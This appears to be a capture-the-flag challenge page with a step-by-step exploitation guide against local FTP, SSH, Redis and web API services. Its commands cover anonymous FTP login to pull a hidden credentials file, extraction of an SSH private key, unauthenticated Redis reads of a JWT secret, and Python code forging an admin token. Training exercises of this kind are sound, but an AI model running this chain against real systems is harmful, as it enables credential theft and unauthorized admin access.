Flag Submission
Submit flags discovered through REAL exploitation. Each service contains one flag.
Expected format: FLAG{service-name-description}
Exploitation Guide
Step 1: Reconnaissance
nmap -sV -p 2121,2222,6379,8080 localhost
Discover open ports and service versions.
Step 2: FTP Service Exploitation
ftp localhost 2121
Username: anonymous
Password: [press Enter]
ls -la
get .hidden_creds.txt
Use anonymous login to access FTP server and download hidden credentials.
Step 3: SSH Access
# Extract SSH key from downloaded file
cat .hidden_creds.txt | grep -A 100 "Private Key" | tail -n +2 | head -n -4 > ssh_key.b64
base64 -d ssh_key.b64 > ssh_key.pem
chmod 600 ssh_key.pem
# Connect via SSH
ssh -i ssh_key.pem -p 2222 admin_zt@localhost
Extract SSH private key from FTP file and connect to SSH service.
Step 4: Redis Data Extraction
redis-cli -h localhost -p 6379
KEYS *
GET zt:flag:redis
GET zt:api:jwt_secret
Access Redis database without authentication to extract JWT secret and flag.
Step 5: JWT Token Forgery
# Use Python to forge admin JWT token
import jwt
import time
secret = "SuperSecretJWTKeyForZTAPI2026"
payload = {
"user": "admin_007",
"role": "admin", # Changed from "user"
"iat": int(time.time())
}
token = jwt.encode(payload, secret, algorithm="HS256")
print(f"Token: {token}")
Use extracted JWT secret to forge admin authentication token.
Step 6: Admin API Access
curl -H "Authorization: Bearer [FORGED_TOKEN]" \
http://localhost:8080/api/v1/admin/flag
Use forged token to access admin endpoint and retrieve final flag.
Challenge Objectives
- Capture all 4 flags (one from each service)
- Demonstrate actual network exploitation skills
- Chain vulnerabilities between services
- Submit flags via this interface
- Complete challenge with 100% progress